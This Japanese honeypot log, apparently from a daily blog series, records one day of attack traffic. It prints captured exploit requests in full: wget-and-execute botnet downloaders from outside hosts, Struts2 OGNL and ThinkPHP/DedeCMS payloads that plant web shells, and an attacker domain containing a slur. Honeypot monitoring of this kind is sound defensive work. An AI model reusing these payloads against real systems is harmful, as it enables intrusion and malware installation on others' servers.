WOWHoneypot観察(336日目)
2020/02/17(月)
トータルは161件でした。
ハンティングログは以下です。
| 212.131.13[.]41 wget hxxp[:]//switchnets[.]net/hoho.arm7 |
| 85.33.36[.]165 wget hxxp[:]//switchnets[.]net/hoho.arm7 |
www.virustotal.com
www.virustotal.com
| 1.162.144[.]38 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws |
| 114.38.63[.]123 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws |
www.virustotal.com
www.virustotal.com
| 件数 | 概要 | リクエスト |
|---|---|---|
| 71 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 43 | アクセス | GET / |
| 7 | 調査 | GET /is_test |
| 6 | phpMyAdminの調査 | GET /admin-scripts.asp |
| 2 | ThinkPHPの脆弱性を狙った通信 | POST //index.php/?s=captcha |
| 2 | MVPower DVRなどの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws |
| 2 | 調査 | GET /script |
| 2 | Tomcatの調査 | GET /manager/text/list |
| 2 | LineareMerge E3シリーズの脆弱性を狙った通信 | GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60 |
| 1 | ThinkPHPの脆弱性を狙った通信 | POST //shell.php |
| 1 | Apache Struts2の調査 | POST //login.action |
| 1 | ThinkPHPの脆弱性を狙った通信 | POST //include/taglib/shell.lib.php |
| 1 | Apache Struts2の脆弱性を狙った通信 | POST //%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27echo%20%22%3C%if(request.getParameter(%22f%22)!=null)(new%20java.io.FileOutputStream(application.getRealPath(%22%5C%22)+request.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes());%%3E%20%22%20%3E%3Eshell.jsp%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/upload.action |
| 1 | Apache Struts2の脆弱性を狙った通信 | POST //%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27echo%20%22%3C%if(request.getParameter(%22f%22)!=null)(new%20java.io.FileOutputStream(application.getRealPath(%22%5C%22)+request.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes());%%3E%20%22%20%3E%3Eshell.jsp%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/showcase.action |
| 1 | Apache Struts2の脆弱性を狙った通信 | POST //%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27echo%20%22%3C%if(request.getParameter(%22f%22)!=null)(new%20java.io.FileOutputStream(application.getRealPath(%22%5C%22)+request.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes());%%3E%20%22%20%3E%3Eshell.jsp%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/showAnouncement.action |
| 1 | Apache Struts2の脆弱性を狙った通信 | POST //%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27echo%20%22%3C%if(request.getParameter(%22f%22)!=null)(new%20java.io.FileOutputStream(application.getRealPath(%22%5C%22)+request.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes());%%3E%20%22%20%3E%3Eshell.jsp%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/login.action |
| 1 | phpMyAdminの調査 | GET /phpmyadmin/ |
| 1 | Apache Struts2の調査 | GET //login.action/shell.jsp?f=SB360.txt&t=hello,SB360 |
| 1 | Apache Struts2の調査 | GET //login.action/SB360.txt |
| 1 | Apache Struts2の調査 | GET //login.action |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&content=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=shell.php&content=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5CRequest/input&filter=system&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5CRequest/input&filter=phpinfo&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=shell.php&vars%5B1%5D%5B%5D=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //index.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //include/taglib/shell.lib.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST%5Bshell%5D);$s();?%3E&filename=shell.lib.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET //dede/tpl.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET ///shell.php |
にほんブログ村